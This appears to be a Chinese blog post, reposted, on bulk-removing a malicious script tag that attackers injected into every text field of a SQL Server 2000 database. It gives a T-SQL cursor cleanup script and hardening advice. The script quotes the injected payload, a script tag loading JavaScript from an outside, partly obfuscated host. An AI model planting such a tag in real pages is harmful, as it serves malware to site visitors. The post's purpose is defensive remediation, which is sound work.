SQL 2000挂马的批量替换
来源:互联网 发布:网络劫持金山毒霸 编辑:程序博客网 时间:2024/04/29 16:46
前不久,万网的提供的sql中了木马,几乎每个字段都被加了<script>,上万的数据不可能一个个删,用“查询分析器”替换也只能一个个字段的来,上网搜了一下,发现有遇到同样情况的人,提供了一个办法,这个忒好用了,库里的都能删掉,记录一下,做个备份:
declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)set @inScript='<script src=http://3b%6Fmb.com/c.js></script>'
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec('update ['+@t+'] set ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')' )
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;
还有,就是要去掉角色public对sysobjects与syscolumns对象的select访问(我用的是万网的,没办法改这个,至少我没找到,本地是可以的),当然最主要的还是查查网站的漏洞了!
0 0
- SQL 2000挂马的批量替换
- SQL批量替换某个字段的内容
- sql批量替换某一字段的字符
- sql批量替换字段里的字符串
- SQL批量替换
- SQL 批量替换字符串
- SQL批量替换语句
- sql语句-批量替换
- SQL中的批量替换
- SQL中的批量替换
- SQL批量替换
- MSSQL批量替换语句 在SQL SERVER中批量替换字符串的方法
- SQL Server批量替换所有表中内容sql语句-清楚挂马
- 批量替换字段指定的字符的sql
- sql怎么批量替换字段里的字符串的?
- sql批量替换特定字符
- SQL批量替换指定字符
- Sql Server 批量替换被插入的木马记录
- RichEdit 取消全选
- MBR&GPT硬盘分区类型&属性详解(Win下更改/设置OEM/恢复分区方法)
- Centos 6.6 install gcc-4.8.2
- 升级android sdk到5.0,创建项目错误解决方法
- 我在学习爬虫(二)
- SQL 2000挂马的批量替换
- getchar()函数getch()函数区别?
- ubuntu解压缩命令(转+收藏)
- Netty demo 时间查询
- 什么是iBeacons
- 4G时代的移动运营商们
- ssh 设置超时时间 Write failed: Broken pipe
- IE怎么bootstrap怎么居中兼容
- PHP中返回上一页的问题